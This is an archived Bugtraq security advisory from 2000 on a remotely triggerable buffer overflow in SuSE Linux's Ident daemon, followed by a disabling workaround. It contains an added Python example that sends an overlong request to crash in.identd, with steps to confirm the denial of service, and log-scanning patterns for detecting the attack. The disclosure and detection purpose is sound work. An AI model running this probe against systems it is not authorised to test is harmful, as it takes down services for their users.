Bugtraq mailing list archives
SuSE Linux 6.x 7.0 Ident buffer overflow
From: Niels Heinen <niels.heinen () UBIZEN COM>
Date: Tue, 28 Nov 2000 17:20:11 +0100
***************************************************************************
Subject:        Ident buffer overflow
Platforms:      SuSE Linux 6.x, 7.0
Risk Level:     High
Author:         Niels Heinen
Vendor Status:  Notified; patches will be available today.
***************************************************************************

Impact of the vulnerability:
============================

This advisory details a buffer overflow vulnerability under SuSE Linux that enables a malicious user to crash the Identification Protocol (Ident) daemon. Once the daemon is down, the system can no longer establish certain connections that rely on Ident, for example IRC (Internet Relay Chat) connections. If the Ident daemon is not running, users wishing to connect to IRC will not be allowed to connect, so the vulnerability can be used in a denial of service attack to keep a person off IRC.

It is not clear at present whether this vulnerability can be exploited in such a way that arbitrary code is executed. If so, the code would run with the privileges of the user "nobody" in a default installation.

Who's vulnerable?
=================

This vulnerability has been tested on SuSE version 6.x and version 7.0. Previous versions may also be affected. Further testing will reveal whether other Linux distributions are vulnerable.

Technical description:
======================

By sending longer than expected strings to the identd port, a remote attacker can crash the daemon. Given the right string length, the daemon also fails to leave any log message, so an empty log does not prove that no attack took place. Seeing the following in the logfile (/var/log/messages)

  date: suse-machine in.identd[xxx]: s_snprintf(...) = ?: buffer overrun

is a clear indication of being attacked with a message length that does produce log entries. Some other Linux distributions are not vulnerable in the same way, but should still be checked for suspicious log entries: a test machine running Red Hat issued a "Full buffer closing connection" error.
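The probe and the log check described in this section, as an added example that is not part of the advisory or of SuSE's code. It assumes ident listens on TCP 113 as in RFC 1413; the 1024-byte request length is an assumption, since the advisory states no exact length; the SAMPLE_LOG lines are constructed, and the Red Hat pattern is matched loosely because the advisory quotes only the phrase, not the full log line.

```python
"""Probe builder and /var/log/messages check for the in.identd overflow.

Added example, not code from the advisory. Assumptions: ident listens on
TCP 113 (RFC 1413); the overlong request length of 1024 bytes is a guess,
the advisory states no exact length; the SAMPLE_LOG lines are constructed.
"""
import re
import socket
from typing import List, Optional, Tuple

IDENT_PORT = 113


def rfc1413_query(server_port: int, client_port: int) -> bytes:
    """A well-formed Ident request: '<server-port>, <client-port>' + CRLF."""
    for p in (server_port, client_port):
        if not 0 < p < 65536:
            raise ValueError("port out of range: %d" % p)
    return ("%d, %d\r\n" % (server_port, client_port)).encode("ascii")


def overlong_query(length: int = 1024) -> bytes:
    """A request 'longer than expected', the crash trigger the advisory names.

    Digits only, so a daemon that parses the port before checking the length
    still sees something that looks like a port number. Send this only to a
    host you are authorised to test: a vulnerable in.identd stops answering.
    """
    return b"1" * length + b"\r\n"


def send_query(host: str, payload: bytes, timeout: float = 5.0) -> Optional[bytes]:
    """Send one request and return the reply, or None if the daemon closed
    the connection or stayed silent. A None reply to rfc1413_query() right
    after overlong_query() is the denial-of-service symptom described above."""
    with socket.create_connection((host, IDENT_PORT), timeout=timeout) as sock:
        sock.sendall(payload)
        try:
            data = sock.recv(1024)
        except socket.timeout:
            return None
    return data or None


# Log signatures: the SuSE line is quoted in the advisory; for Red Hat only the
# phrase "Full buffer closing connection" is quoted, so that match is loose.
SUSE_OVERRUN = re.compile(
    r"in\.identd\[(?P<pid>\d+)\]: s_snprintf\(.*?\) = .*?: buffer overrun")
REDHAT_FULL = re.compile(
    r"identd\[(?P<pid>\d+)\]: .*Full buffer closing connection")


def scan_log(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (pid, kind, line) for every entry that signals an overlong
    Ident request. Caveat from the advisory: a string of the right length
    crashes the daemon without any log line, so an empty result does not
    prove the host was not probed."""
    hits = []
    for line in lines:
        m = SUSE_OVERRUN.search(line)
        if m:
            hits.append((int(m.group("pid")), "suse-buffer-overrun", line.rstrip()))
            continue
        m = REDHAT_FULL.search(line)
        if m:
            hits.append((int(m.group("pid")), "redhat-full-buffer", line.rstrip()))
    return hits


# Constructed sample log (not real output): two indicators around a normal line.
SAMPLE_LOG = [
    "Nov 28 17:20:11 suse-machine in.identd[1234]: s_snprintf(...) = ?: buffer overrun",
    "Nov 28 17:20:12 suse-machine in.identd[1235]: connection from 10.0.0.5",
    "Nov 28 17:21:03 rh-machine identd[4321]: Full buffer closing connection",
]


if __name__ == "__main__":
    for pid, kind, line in scan_log(SAMPLE_LOG):
        print("%s pid=%d: %s" % (kind, pid, line))
```

To reproduce the denial of service against a host you own, call `send_query(host, overlong_query())` and then `send_query(host, rfc1413_query(6667, 1025))`: a patched daemon still answers the second request, a vulnerable one has died and returns None. Run `scan_log` over the real /var/log/messages to find the entries the advisory describes, keeping in mind that the right string length leaves no entry at all.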
Workarounds:
============

If you don't need Ident, you can keep the risk lowest by disabling the ident daemon. This is done by editing /etc/rc.config. Look for a line like the one below:

  START_IDENTD="yes"

Change the yes value to no and save the file. After that, type as root

  killall -9 in.identd

to stop the running ident daemon.

More information:
=================

Bug finder: Niels Heinen (niels.heinen () ubizen com)
Suse web site: http://www.suse.com
Suse security email: security () suse com
SecurityWatch.com: http://www.securitywatch.com
Ident RFC: http://andrew2.andrew.cmu.edu/rfc/rfc1413.html

The Disclaimer:
===============

***********************************************************************************
All documents and services are provided as is. Ubizen expressly disclaims all warranties, express or implied, including without limitation any implied warranties of merchantability or fitness for a particular purpose, and warranties as to accuracy, completeness or adequacy of information. Ubizen cannot be held accountable for any incorrect or erroneous information. By using the provided documents or services, the user assumes all risks.
***********************************************************************************
Attachment:
smime.p7s
Description: S/MIME Cryptographic Signature
Current thread:
- SuSE Linux 6.x 7.0 Ident buffer overflow Niels Heinen (Nov 29)
- Re: SuSE Linux 6.x 7.0 Ident buffer overflow Roman Drahtmueller (Nov 30)